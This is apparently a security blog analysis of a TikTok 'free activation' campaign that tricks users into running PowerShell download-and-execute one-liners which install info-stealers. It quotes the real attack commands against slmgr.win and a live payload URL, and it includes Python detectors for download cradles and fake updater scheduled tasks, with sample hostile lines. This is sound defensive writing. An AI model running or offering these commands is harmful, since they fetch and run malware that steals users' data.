# Trend 'free software activation' on TikTok – a gateway for malware to enter your device

TikTok is known as a social media platform for sharing short videos, allowing users to create, edit, and share videos ranging from a few seconds to a few minutes, often with music, effects, and creative filters. As of 2025, the platform has attracted **over 1.5 billion monthly active users across 150 countries** and supports more than **75 languages**.

![Beware of Trending TikTok Videos Promoting Pirated Apps That Deliver ...](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLu5F27piG4f16DyM0Uk-LqJRiArgX4mYRPe88NihkGS4eR05tyRjy_OifezfxHBfHtFRaOMQiR6zL-sKgod9WFaiUvLalNYuIamfJw9sLu3HvQH5S805E63HUMKd2Nn9_EHH1ymXmqphHuv1guI5VBLyznlABBm2aLfSFpcEanbTCU_5YnEQ-0ZvCoec/s16000/TikTok.webp align="center")

Because of this sustained popularity, cybercriminal groups are exploiting TikTok's viral reach to post fake "tutorial" videos (often AI-generated or deepfake) that urge viewers to run a command on their device (typically in PowerShell) to install pirated software (cracks, activators, or "free" apps). When a user copies and runs that command, it downloads and executes info-stealers or loaders such as **Vidar, StealC, and Latrodectus**, a variant of the **“ClickFix” or “Click-to-fix”** tactic. The worrying part is that these scam videos routinely attract hundreds of thousands of views, which makes them a significant threat to information systems.

In this article, we discuss one such campaign that spreads malware through Windows PowerShell by instructing users to crack Adobe software, which is widely used.

![](https://isc.sans.edu/diaryimages/images/isc-20251017-1.png align="center")

## **How the Attack Works**

As mentioned earlier, attackers rely on the well-known **“ClickFix” (also called “Click-to-fix”)** technique to initiate their campaigns. First, the attacker distributes TikTok videos instructing users to update **CapCut** or crack **Adobe** software, and these videos attract a large number of viewers.

* [https://vm.tiktok.com/ZGdaCkbEF/](https://vm.tiktok.com/ZGdaCkbEF/)
    
* [https://vm.tiktok.com/ZGdaX8jVq/](https://vm.tiktok.com/ZGdaX8jVq/)
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760892593260/6a864802-c129-4b04-b983-b772d0e32cd4.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760892808735/bbacf4f1-07b3-4eb0-b49c-78d4f248341d.png align="center")

Both tutorial videos use the same trick: they instruct users to open **Windows PowerShell** and run it as an **Administrator**. Besides executing commands quickly, an elevated PowerShell session lets whatever is pasted into it:

* Edit the system **registry**.
    
* Manage **services, drivers, and other users' processes**.
    
* Access **system directories** (`C:\Windows\System32`, `C:\Program Files`, …).
    
* Install software and modules, or change policies (`Set-ExecutionPolicy`, `Install-Module`, …).
    

Once PowerShell is open with administrator rights, the attacker tricks the user into executing one of these commands:

* `iex (irm slmgr.win/photoshop)` - for users who want to crack Adobe software
    
* `iex (irm slmgr.win/capcut)` - for users who want to activate CapCut
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760894384976/e67b8773-2c67-4edc-9b8f-0121422479e9.png align="center")

When the user runs one of the commands above, `irm` (Invoke-RestMethod) downloads a script from [`https://slmgr.win/photoshop`](https://slmgr.win/photoshop) and `iex` (Invoke-Expression) **executes it directly in memory**, without the script ever being saved to disk. Scam campaigns on TikTok and YouTube have used this exact method to spread malware.
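The `iex (irm ...)` one-liner is the part of this chain that is visible to a defender before anything else happens: with PowerShell script block logging enabled it lands in the ScriptBlockText field of Event ID 4104. The following added example (not code from the original post or from the campaign) shows detection logic for that cradle shape, generalised beyond the exact command in the videos to spelled-out variants such as `Invoke-Expression (...).DownloadString(...)` and to the flags a persistence action tends to add. The log lines are constructed samples, and the hosts in them are placeholders, not indicators from this campaign.

```python
"""Added example (not from the original post): flag ClickFix-style PowerShell
download-and-execute cradles such as `iex (irm <host>/<path>)` in script block
log text (the ScriptBlockText field of Windows PowerShell Event ID 4104).
The sample lines below are constructed; the hosts are placeholders, not
indicators from the campaign described in the post."""
import re
from typing import Dict, List

# Cmdlets and aliases that fetch remote content into the session
# (curl and wget are aliases of Invoke-WebRequest in Windows PowerShell 5.1).
DOWNLOAD = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b"
)
# Constructs that turn fetched text into executed code.
EXECUTE = re.compile(
    r"\b(?:iex|invoke-expression)\b|\.invoke\(|&\s*\(|-enc(?:odedcommand)?\b"
)
# The one-liners pasted from videos are kept short: bare host, no scheme.
SCHEMELESS_FETCH = re.compile(r"\b(?:irm|iwr)\s+[a-z0-9.-]+\.[a-z]{2,}/")
POLICY_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass")
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden")


def analyse_script_block(text: str) -> List[str]:
    """Return the reasons a script block looks like a ClickFix cradle (empty if none)."""
    t = text.lower()
    reasons: List[str] = []
    if DOWNLOAD.search(t) and EXECUTE.search(t):
        reasons.append("download-and-execute cradle")
    if SCHEMELESS_FETCH.search(t) and "://" not in t:
        reasons.append("scheme-less URL passed to irm/iwr")
    if POLICY_BYPASS.search(t):
        reasons.append("execution policy bypass")
    if HIDDEN_WINDOW.search(t):
        reasons.append("hidden window")
    return reasons


def scan(blocks: List[str]) -> Dict[int, List[str]]:
    """Map block index -> reasons, for every block that triggers at least one rule."""
    hits: Dict[int, List[str]] = {}
    for i, block in enumerate(blocks):
        reasons = analyse_script_block(block)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample script blocks (hosts are placeholders, not real IoCs).
SAMPLE_SCRIPT_BLOCKS = [
    # 0: routine admin activity, must not fire
    "Get-Service | Where-Object Status -eq 'Running' | Sort-Object Name",
    # 1: the exact shape of the command shown in the videos
    "iex (irm example-placeholder.invalid/photoshop)",
    # 2: the same cradle spelled out with a WebClient
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://example-placeholder.invalid/stage2.ps1')",
    # 3: a download that is saved to disk, not executed, must not fire
    "Invoke-WebRequest -Uri https://example-placeholder.invalid/report.csv -OutFile C:\\Temp\\report.csv",
    # 4: the shape a logon persistence action tends to take
    'powershell.exe -w hidden -ep bypass -c "iex (irm https://example-placeholder.invalid/u)"',
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"block {idx}: {', '.join(reasons)}")
        print(f"    {SAMPLE_SCRIPT_BLOCKS[idx]}")
```

Feeding real 4104 events through `analyse_script_block` is a matter of extracting ScriptBlockText from each record; the rules deliberately require both a fetch and an execute construct so that ordinary `Invoke-WebRequest -OutFile` downloads do not page anyone.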

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760894929881/dcb4b6c2-7110-4a63-aa5c-10ab7ad551df.png align="center")

The script then downloads the next-stage payload, which is associated with **AuroStealer**, from the link [`https://file-epq.pages.dev/updater.exe`](https://file-epq.pages.dev/updater.exe).

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970267104/f931a23c-c7c8-476b-9e58-abb4c7d77f52.png align="center")

Once downloaded, the malware runs a script that creates **a Scheduled Task** which launches `powershell.exe` with a command and code (stored in the `$scr` variable) each time the user logs in. To disguise itself, the task is given one of the "legitimate/update-like" names (e.g., `MicrosoftEdgeUpdateTaskMachineCore`, `GoogleUpdateTaskMachineCore`, etc.).

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970037683/18ec307a-dfcb-45cf-8014-cb6cb6fa4728.png align="center")

In summary, this script executes the **PowerShell payload (`$scr`) at every user logon**, a common persistence technique in malware.
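The persistence step above leaves a concrete artefact that can be audited: a scheduled task whose name imitates a vendor updater but whose action is a script host. The following added example (not code from the original post) triages Task Scheduler XML, the format returned by `schtasks /query /xml` and carried in the TaskContent field of Security Event ID 4698, for exactly that mismatch. Both task definitions are constructed samples in the real Task Scheduler XML schema; the task name follows the ones the post cites, and the `$scr` argument stands in for the inlined payload.

```python
"""Added example (not part of the original post): triage Task Scheduler XML for
the persistence pattern described above, an update-like task name whose action
is really powershell.exe fired at logon. The two task documents below are
constructed samples in the genuine Task Scheduler XML schema; "$scr" is a
placeholder for the inlined payload, not the campaign's code."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Vendor updater names that malware borrows. A real updater task runs the
# vendor binary from its install directory, never a script host.
UPDATE_LIKE = re.compile(r"(?:microsoftedgeupdate|googleupdate|onedrive|adobe).*(?:task|core|ua)", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden")
IN_MEMORY = re.compile(r"\b(?:iex|invoke-expression)\b|-enc(?:odedcommand)?\b")


def triage_task(name: str, task_xml: str) -> List[str]:
    """Return the reasons a task definition looks like fake-updater persistence."""
    root = ET.fromstring(task_xml)
    reasons: List[str] = []
    fires_at_logon = root.find("t:Triggers/t:LogonTrigger", NS) is not None
    for exec_node in root.findall("t:Actions/t:Exec", NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS).strip().lower()
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS).lower()
        host = cmd.rsplit("\\", 1)[-1].strip('"')
        if host not in SCRIPT_HOSTS:
            continue
        reasons.append(f"action launches script host {host}")
        if UPDATE_LIKE.search(name):
            reasons.append("update-like task name but no vendor updater binary")
        if HIDDEN_WINDOW.search(args):
            reasons.append("hidden window")
        if IN_MEMORY.search(args):
            reasons.append("in-memory/encoded command in arguments")
    if reasons and fires_at_logon:
        reasons.append("fires at user logon")
    return reasons


def audit(tasks: Dict[str, str]) -> Dict[str, List[str]]:
    """Run triage over a {task name: task XML} map and keep only flagged tasks."""
    flagged: Dict[str, List[str]] = {}
    for name, xml_text in tasks.items():
        reasons = triage_task(name, xml_text)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed sample: what the genuine Edge updater task looks like.
GENUINE_EDGE_TASK = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe</Command>
      <Arguments>/c</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: same name, but the action is PowerShell running "$scr"
# (placeholder for the inlined payload).
FAKE_EDGE_TASK = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -Command "iex $scr"</Arguments>
    </Exec>
  </Actions>
</Task>"""

SAMPLE_TASKS = {
    "MicrosoftEdgeUpdateTaskMachineCore": GENUINE_EDGE_TASK,
    "MicrosoftEdgeUpdateTaskMachineCore (fake)": FAKE_EDGE_TASK,
}

if __name__ == "__main__":
    for task_name, reasons in audit(SAMPLE_TASKS).items():
        print(f"{task_name}: {'; '.join(reasons)}")
```

On a live host the same function can be pointed at the XML files under `C:\Windows\System32\Tasks` or at the TaskContent of 4698 events; the name check is only a weighting, the decisive signal is a script host sitting where a vendor binary should be.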

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970171943/b4b073b4-b386-4324-9862-815d5cd42719.png align="center")

Finally, another malicious payload, named `source.exe`, is executed.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970758992/a640e30a-4047-4b75-99c9-395a12511da7.png align="center")

A notable feature of this payload is that it **executes code in memory (in-memory execution)**, which avoids writing files to disk and lets it evade some file-based scanning tools. It can also **run arbitrary payloads**: stealers, loaders, RATs, backdoors, or tooling for data theft and lateral movement.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760971259876/3702da36-379c-47d8-aee3-909b32b755f7.png align="center")

## **Conclusion**

This campaign shows that cybercriminal groups are effectively using short-video platforms like TikTok and YouTube to deploy malware that is compiled on the fly and run in memory through PowerShell. The attackers cleverly exploit TikTok's viral nature to trick users into running commands and scripts themselves (social engineering).

It is effective because it combines strong social engineering with sophisticated techniques (persistence plus in-memory execution), which greatly reduces the chance of early detection if defenders rely solely on traditional signature scanning. Countering it requires coordinating **technical prevention (EDR, GPO, AppLocker), observation/monitoring (logging + SIEM), and human factors (training, awareness)**.

## **Recommendations**

1. **For Users**
    
    * Do not trust "free tips" or "software hacks."
        
    * **Do not run commands requested from videos or external links** (especially with admin rights).
        
    * **Keep software updated**: The operating system, security software, browsers, social media apps, and the other applications you use should all be kept up to date to minimize the risk of exploitation by new malware.
        
2. **Recommendations for Organizations and IT Administrators**
    
    * **Implement user education and training**: Organizations should run a "phishing awareness" program (phishing, malvertising, social engineering) that covers campaigns like this one, where social media videos lure users into running malware themselves.
        
    * **Restrict the ability to run untrusted code in PowerShell**: Use Group Policy to block or control the downloading and running of scripts from the internet, especially with administrative rights.
        
    * **Use EDR/NGAV solutions capable of detecting "self-compiling" behavior or shellcode injection into memory**: The referenced analysis notes the use of `csc.exe` in stage 2 to compile code and inject shellcode.
        
    * **Software download policy**: Allow users to download software only from internal sources or approved software repositories, not from social media links or unknown domains.
        

## **IOC**

1. **Link Tiktok**
    
    * hxxps://vm\[.\]tiktok\[.\]com/ZGdaCkbEF/
        
    * hxxps://vm\[.\]tiktok\[.\]com/ZGdaC7EQY/
        
    * hxxps://vm\[.\]tiktok\[.\]com/ZGdaX8jVq/
        
2. **Domain**
    
    * hxxps://file-epq\[.\]pages\[.\]dev/updater.exe
        
    * slmgr\[.\]win/photoshop
        
    * slmgr\[.\]win/capcut
        
3. **Hash File**
    
    * 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23
        
    * db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
        
    * 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8
        

## **References**

1. [TikTok Videos Weaponized to Deliver Self-Compiling PowerShell Malware](https://gbhackers.com/tiktok-videos/)
    
2. [TikTok Videos Promoting Malware Installation - SANS ISC](https://isc.sans.edu/diary/32380)
